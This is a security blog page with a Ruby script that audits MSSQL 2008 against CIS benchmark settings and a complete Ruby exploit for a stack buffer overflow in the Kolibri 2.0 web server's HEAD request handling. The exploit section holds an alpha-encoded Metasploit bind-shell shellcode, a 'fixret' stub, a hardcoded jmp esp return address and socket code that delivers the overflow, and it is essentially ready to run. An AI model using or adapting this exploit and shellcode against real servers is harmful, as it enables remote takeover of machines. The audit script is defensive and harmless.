Thursday, May 8, 2014

Gremwell Magictree - Nessus Compliance Audit Parser and Sample Report Template

I always have trouble generating compliance reports with Nessus, so I modified nessus22mt.xsl in the MagicTree Nessus XML parser to assist me. Nothing fancy, just a decent report to ease my load during the reporting process.

1) nessus22mt.xsl
https://drive.google.com/file/d/0B8CrAOgplUJcTGJWd21tZ1FtYW8/edit?usp=sharing

2) Sample report template (openoffice)
https://drive.google.com/file/d/0B8CrAOgplUJcY1JidEU0bEgwR1U/edit?usp=sharing

MSSQL 2008 Database Security Audit Script

#!/usr/bin/env ruby

# Author : Muhamad Fadzil Ramli
# Title : mssql audit script - 2013
# Installation:
# yum install freetds freetds-dev ruby ruby-dev
# gem install tiny_tds
# Notes:
# This script was created to assist me during an MSSQL 2008 database security audit for a customer.
# Reference:
# CIS Security Benchmark
# http://www.mssqltips.com/sqlservertip/2887/sql-server-security-audit-part-2-scripts-to-help-you-or-where-can-you-find-more-information/

require 'rubygems'
require 'tiny_tds'

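# Connection settings. Credentials come from the environment so they do not
# have to be edited into (and shipped with) the script; the original literal
# values are kept only as fallbacks so existing invocations still behave the
# same. Override with MSSQL_USER / MSSQL_PASS / MSSQL_SERVER.
user = ENV.fetch("MSSQL_USER", "sa")
pass = ENV.fetch("MSSQL_PASS", "password")
dbsvr = ENV.fetch("MSSQL_SERVER", "192.168.1.129")

# Open the connection once; every check below reuses this client.
begin
  client = TinyTds::Client.new(:username => user, :password => pass, :dataserver => dbsvr)
rescue TinyTds::Error => e
  puts "[!] #{e}"
  # Non-zero status so a wrapper script or cron job notices the failed connection
  # (a bare `exit` reports success).
  exit 1
end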

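# Sparse table of audit checks, indexed by the check number used in the report;
# each entry is [label, T-SQL]. Unused numbers stay nil and are skipped by the
# runner loop. The SQL is written in %Q[] literals, which process escapes like a
# double-quoted string: a backslash meant for T-SQL (registry paths, DOMAIN\name
# logins) must be written as `\\` — a single backslash before a letter is treated
# as an escape and silently dropped by Ruby.
sql = []

# A.1 / CIS.1.1 / SERVICE PACKS AND PATCHES
sql[0] = [%Q[A.1\t- Service pack and patches], %Q[
SELECT SERVERPROPERTY('ProductLevel') as SP_installed,
SERVERPROPERTY('ProductVersion') as Version
]]

# B.4 / CIS.4.1 / AUTH MODE
sql[4] = [%Q[B.4\t- Authentication mode - Windows], %Q[
xp_loginconfig 'login mode'
]]

# B.5 / C2 AUDIT MODE
sql[5] = [%Q[B.5\t- C2 audit mode - Enable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'c2 audit mode'
]]

# B.6 / SCAN STARTUP PROCS
sql[6] = [%Q[B.6\t- Scan for startup procedures - Disable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'scan for startup procs'
]]

# B.7 / NAMED PIPES
#sql[7] = [%Q[B.7\t- Named pipes disabled?], %Q[
#SELECT name, type_desc, state, state_desc,
#endpoint_id FROM sys.endpoints WHERE endpoint_id < 65536 AND protocol = 3
#]]

# B.7 / NAMED PIPES
sql[7] = [%Q[B.7\t- Named pipes - Disable], %Q[
DECLARE @NamedPipesEnabled int
EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE',
N'Software\\Microsoft\\MSSQLServer\\MSSQLServer\\SuperSocketNetLib\\Np',
N'Enabled',
@NamedPipesEnabled OUTPUT
SELECT @NamedPipesEnabled AS NamedPipesEnabled
]]

# B.8/B.9 - Works only in SQL 2008 SP1 & 2012
sql[8] = [%Q[B.8 - SQL services], %Q[
SELECT * FROM sys.dm_server_services
]]

# B.10
sql[10] = [%Q[B.10\t- Distributed Transaction Coordinator - Disable], %Q[
sp_configure 'remote proc trans'
]]

# B.11 / CIS-2.3 / CROSS DATABASE OWNERSHIP CHAINING
sql[11] = [%Q[B.11 - Cross db ownership chaining - Disbale], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'Cross db ownership chaining'
]]

# B.12 / REPLICATION
sql[12] = [%Q[B.12\t- Replication XPs - Disable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'Replication XPs'
]]

# B.13 / Local Administration Group Membership
# The login name needs an escaped backslash: %Q['BUILTIN\Administrators'] would
# reach the server as 'BUILTINAdministrators' and the lookup would fail.
sql[13] = [%Q[B.13\t- Local administration group membership - None], %Q[
EXEC master.sys.xp_logininfo 'BUILTIN\\Administrators','members'
]]

# C.14 / CIS.2.14 # SA ENABLED?
sql[14] = [%Q[C.14\t- SA account - Disable], %Q[
SELECT name, is_disabled
FROM sys.server_principals
WHERE sid = 0x01
]]

# C.15 / LIST DATABASES
sql[15] = [%Q[C.15\t- Default database exist? PUBS, Northwind], %Q[
SELECT name
FROM master..sysdatabases
]]

#sql[15] = [%Q[C.15\t- List Database], %Q[
#SELECT name FROM master.sys.databases
#WHERE name IN ('pubs', 'Northwind') OR name LIKE 'Adventure Works%'
#]]

# C.16 / LIST STORED PROCEDURES
sql[16] = [%Q[C.16\t- Drop unnecessary stored procedures. e.g xp_cmdshell], %Q[
EXECUTE sp_helpextendedproc
]]

# D.17 / PASSWORD POLICY ENFORCEMENT
sql[17] = [%Q[D.17\t- Password Policy Enforcement - Enable], %Q[
SELECT SQLLoginName = sp.name,
PasswordPolicyEnforced = CAST(sl.is_policy_checked AS BIT)
FROM sys.server_principals sp
JOIN sys.sql_logins AS sl ON sl.principal_id = sp.principal_id
WHERE sp.type_desc = 'SQL_LOGIN'
]]

# E.18 / Enable Security Audit Events
sql[18] = [%Q[E.18\t- Security audit events - Enable], %Q[
select * from sys.database_audit_specification_details
]]

# E.19 / CIS.6.3 / LOGIN ATTEMPTS LOG
sql[19] = [%Q[D.19\t- Logging of login attemps - All], %Q[
XP_loginconfig 'audit level'
]]

# E.20 / MAXIMUM NUMBER OF LOGS
sql[20] = [%Q[D.20\t- Maximum numbers of error logs - 12], %Q[
DECLARE @MaxNumErrorLogs int
EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE',
       N'Software\\Microsoft\\MSSQLServer\\MSSQLServer',
       N'NumErrorLogs',
       @MaxNumErrorLogs OUTPUT
       SELECT @MaxNumErrorLogs AS MaxNumErrorLogs
]]

# F.21 / CIS.2.9 / SQL MAIL XPS
sql[21] = [%Q[F.21\t- SQL Mail XPs  - Disable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'SQL Mail XPs'
]]

# G.22 / AD HOC REMOTE QUERIES
sql[22] = [%Q[G.22\t- Ad hoc remote queries - Disable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'ad hoc distributed queries'
]]

# G.23 / CLR INTEGRATION
sql[23] = [%Q[G.23\t- CLR Integration - Disable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'clr enabled'
]]

# G.24 / DATABASE MAIL
sql[24] = [%Q[G.24\t-Database Mail - Disable], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'Database Mail XPs'
]]

# G.25 / NATIVE XML WEB SERVICES
sql[25] = [%Q[G.25\t- Native XML Web Services - None], %Q[
SELECT name, type_desc, state, state_desc,
endpoint_id FROM sys.endpoints WHERE endpoint_id < 65536 AND type = 1
]]

# G.26 / SERVICE BROKER
sql[26] = [%Q[G.26\t- Service Broker - None], %Q[
SELECT name, type_desc, state, state_desc,
endpoint_id FROM sys.endpoints WHERE endpoint_id < 65536 AND type = 3
]]

# G.27
sql[27] = [%Q[G.27\t- Web Assistant - None], %Q[
SELECT name,
CAST(value as int) as value_configured,
CAST(value_in_use as int) as value_in_use
FROM sys.configurations
WHERE name = 'Web Assistant Procedures'
]]

# G.29 / ANONYMOUS CONNECTIONS
sql[29] = [%Q[G.29\t- Anonymous connections - Disable], %Q[
DECLARE @AnonConn INT
EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE',
       N'SYSTEM\\CurrentControlSet\\Control\\Lsa',
       N'TurnOffAnonymousBlock',
       @AnonConn OUTPUT
       SELECT @AnonConn AS AnonConnections
]]

# G.30 / LINKED OBJECTS / http://support.microsoft.com/kb/203638
sql[30] = [%Q[G.30\t- Linked objects - Disable], %Q[
sp_linkedservers
]]

# G.31 / USER DEFINED FUNC
sql[31] = [%Q[G.31\t- User defined functions - None], %Q[
SELECT *
FROM sys.objects
WHERE type_desc = 'SQL_SCALAR_FUNCTION'
]]

# G.32 / WINDOWS INTEGRATED SECURITY
sql[32] = [%Q[G.32 - Windows integrated security - Enable], %Q[
SELECT CAST(SERVERPROPERTY ('IsIntegratedSecurityOnly') as int) as WinIntegratedSecurity
]]

# G.33 / VIEW PUBLIC PERMISSION
sql[33] = [%Q[G.33\t- List 'PUBLIC' permission], %Q[
sp_helprotect @username='public'
]]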

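# Run every defined check and print its numbered label followed by one line per
# result row. Unused slots in the sparse `sql` array are skipped and do not
# consume a sequence number.
count = 0
sql.each do |col|
  next if col.nil?

  # The original fell through to `res.each` with `res` unset when the client was
  # not active, which raised NoMethodError; skip the check instead.
  unless client.active?
    puts "[!] sql client is not active"
    next
  end

  count += 1
  puts "[#{count}] #{col[0]}"

  begin
    res = client.execute(col[1])
    res.each { |row| puts row.to_s }
  rescue TinyTds::Error => e
    # One failing check (e.g. an xp_* procedure not present on this edition)
    # should not abort the remaining checks.
    puts "[!] #{e}"
  end
  puts ""
end

# Release the connection explicitly rather than relying on process exit.
client.close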

Kolibri HEAD Request Stack Buffer Overflow - FixRet Technique

#!/use/bin/env ruby
#
# Exploit Title: Kolibri HEAD Request Stack Buffer Overflow 
# Date: 03 May 2014
# Exploit Author: Muhamad Fadzil Ramli 
# Vendor Homepage: http://www.senkas.com/kolibri/download.php
# Version: Kolibri 2.0 
# Tested on: Microsoft Windows XP (EN) SP3 [Version 5.1.2600]
# MSF Module : https://drive.google.com/file/d/0B8CrAOgplUJcVGpCTGY3VEVyam8/edit?usp=sharing
#
# Description: 
# The affected software suffers a buffer overflow when a long HEAD command is sent to the server.
# Notes:
# Purposely using larger payload size to overwrite return address location so that 'fixret' technique can be applied.
# Reference:
# 1) http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
# 2) jduck - fixret msf module
# 3) http://www.exploit-db.com/exploits/16970/ (mr_me)
# 4) 'TheLeader' - original exploit

require 'socket'

host = "127.0.0.1"
port = 8080

# ./msfpayload -p windows/shell_bind_tcp LPORT='2020' R | ./msfencode -b '\x00\x0d\x0a\x20\x40\x3f' -t ruby -e x86/alpha_upper
# payload size : 751
bindtcp =
"\x89\xe6\xdb\xda\xd9\x76\xf4\x5f\x57\x59\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a" +
"\x48\x4c\x49\x35\x50\x33\x30\x43\x30\x53\x50\x4c\x49\x5a" +
"\x45\x36\x51\x58\x52\x52\x44\x4c\x4b\x46\x32\x50\x30\x4c" +
"\x4b\x56\x32\x34\x4c\x4c\x4b\x51\x42\x42\x34\x4c\x4b\x44" +
"\x32\x56\x48\x44\x4f\x4e\x57\x51\x5a\x36\x46\x46\x51\x4b" +
"\x4f\x50\x31\x39\x50\x4e\x4c\x37\x4c\x45\x31\x53\x4c\x35" +
"\x52\x36\x4c\x47\x50\x49\x51\x38\x4f\x34\x4d\x33\x31\x48" +
"\x47\x4b\x52\x5a\x50\x36\x32\x51\x47\x4c\x4b\x30\x52\x34" +
"\x50\x4c\x4b\x50\x42\x57\x4c\x55\x51\x4e\x30\x4c\x4b\x57" +
"\x30\x34\x38\x4c\x45\x39\x50\x43\x44\x31\x5a\x33\x31\x38" +
"\x50\x50\x50\x4c\x4b\x31\x58\x55\x48\x4c\x4b\x36\x38\x47" +
"\x50\x45\x51\x4e\x33\x5a\x43\x47\x4c\x57\x39\x4c\x4b\x47" +
"\x44\x4c\x4b\x43\x31\x38\x56\x50\x31\x4b\x4f\x36\x51\x49" +
"\x50\x4e\x4c\x4f\x31\x48\x4f\x54\x4d\x53\x31\x58\x47\x56" +
"\x58\x4d\x30\x32\x55\x4b\x44\x33\x33\x43\x4d\x5a\x58\x47" +
"\x4b\x43\x4d\x37\x54\x34\x35\x4a\x42\x51\x48\x4c\x4b\x31" +
"\x48\x56\x44\x35\x51\x39\x43\x32\x46\x4c\x4b\x34\x4c\x30" +
"\x4b\x4c\x4b\x50\x58\x35\x4c\x33\x31\x39\x43\x4c\x4b\x44" +
"\x44\x4c\x4b\x45\x51\x4e\x30\x4c\x49\x31\x54\x46\x44\x57" +
"\x54\x31\x4b\x51\x4b\x55\x31\x30\x59\x30\x5a\x36\x31\x4b" +
"\x4f\x4d\x30\x30\x58\x31\x4f\x50\x5a\x4c\x4b\x44\x52\x5a" +
"\x4b\x4b\x36\x31\x4d\x43\x58\x36\x53\x50\x32\x55\x50\x33" +
"\x30\x35\x38\x33\x47\x54\x33\x47\x42\x51\x4f\x51\x44\x55" +
"\x38\x50\x4c\x32\x57\x56\x46\x33\x37\x4b\x4f\x38\x55\x4e" +
"\x58\x5a\x30\x33\x31\x43\x30\x55\x50\x51\x39\x49\x54\x50" +
"\x54\x56\x30\x55\x38\x51\x39\x4b\x30\x52\x4b\x45\x50\x4b" +
"\x4f\x38\x55\x50\x50\x46\x30\x50\x50\x50\x50\x31\x50\x30" +
"\x50\x51\x50\x56\x30\x32\x48\x5a\x4a\x54\x4f\x59\x4f\x4d" +
"\x30\x4b\x4f\x48\x55\x4b\x39\x58\x47\x56\x51\x39\x4b\x50" +
"\x53\x32\x48\x34\x42\x35\x50\x54\x47\x4b\x54\x4d\x59\x4d" +
"\x36\x52\x4a\x44\x50\x51\x46\x31\x47\x55\x38\x4f\x32\x59" +
"\x4b\x36\x57\x52\x47\x4b\x4f\x49\x45\x30\x53\x46\x37\x33" +
"\x58\x4e\x57\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x48\x55\x46" +
"\x33\x56\x33\x46\x37\x45\x38\x53\x44\x5a\x4c\x37\x4b\x4b" +
"\x51\x4b\x4f\x38\x55\x56\x37\x4b\x39\x39\x57\x33\x58\x54" +
"\x35\x32\x4e\x30\x4d\x33\x51\x4b\x4f\x49\x45\x45\x38\x43" +
"\x53\x52\x4d\x52\x44\x45\x50\x4b\x39\x5a\x43\x30\x57\x56" +
"\x37\x31\x47\x36\x51\x4a\x56\x43\x5a\x45\x42\x51\x49\x30" +
"\x56\x4b\x52\x4b\x4d\x35\x36\x49\x57\x57\x34\x51\x34\x57" +
"\x4c\x43\x31\x33\x31\x4c\x4d\x50\x44\x51\x34\x42\x30\x39" +
"\x56\x53\x30\x50\x44\x46\x34\x50\x50\x30\x56\x51\x46\x31" +
"\x46\x50\x46\x31\x46\x30\x4e\x30\x56\x50\x56\x30\x53\x30" +
"\x56\x43\x58\x42\x59\x38\x4c\x57\x4f\x4d\x56\x4b\x4f\x4e" +
"\x35\x4c\x49\x4b\x50\x50\x4e\x56\x36\x30\x46\x4b\x4f\x56" +
"\x50\x45\x38\x53\x38\x4d\x57\x45\x4d\x55\x30\x4b\x4f\x38" +
"\x55\x4f\x4b\x4c\x30\x58\x35\x39\x32\x51\x46\x42\x48\x4f" +
"\x56\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x54" +
"\x46\x53\x4c\x54\x4a\x4d\x50\x4b\x4b\x4d\x30\x54\x35\x43" +
"\x35\x4f\x4b\x47\x37\x44\x53\x32\x52\x32\x4f\x53\x5a\x45" +
"\x50\x51\x43\x4b\x4f\x58\x55\x41\x41"

# 750 buffer
data = "A" * 796

# fixret stub
# Reference : http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
data[1,9] = "\x90" * 9
data[10,2] = "\x89\xe2"              # mov edx,esp
data[12,6] = "\xc7\x02\x43\x43\x43\x43"    # mov [edx],0x43434343
data[18,3] = "\x83\xc2\x04"           # add edx,4
data[21,3] = "\xc6\x02\xc0"           # mov byte ptr [edx], 0x42
data[24,3] = "\x83\xea\x08"           # sub edx,8
data[27,6] = "\xc7\x02\x41\x41\x41\x41"    # mov [edx],0x41414141
data[33,6] = "\x81\xc4\xfc\xfd\xff\xff"    # add esp,0xfffffdfc
data[39,bindtcp.length] = bindtcp

# Patch the original stack data into the fixer stub
data[14,4] = data[519,4] # patch jmp near 1-4 byte code
data[23,1] = data[523,1] # patch jmp near 5th byte code
data[29,4] = data[515,4] # patch ret addr

# Overwriting part of the payload with ret address and jmp code
data[515,4] = [0x775a693b].pack("V")    # jmp esp # 5.1.2600.6435 [OLE32.dll]
data[519,5] = "\xe9\xfb\xfd\xff\xff"    # jmp $-512

# Review note (detection/mitigation): every slice assignment above replaces a
# span with one of the same length, so `data` stays 796 bytes and the only
# traffic produced is one request line of roughly 800 bytes carrying the
# non-standard version token "HTTP/1.11" exactly as written below. An unusually
# long request line to this service is the cheap signal a proxy/IDS rule or a
# request-line length limit can act on. The return address is tied to one
# OLE32.dll build (comment above), so the PoC appears specific to the Windows XP
# SP3 build named in the header.
payload =
"HEAD /#{data} HTTP/1.11\r\n\r\n"

s = TCPSocket.new(host, port)
s.send(payload,0)
s.close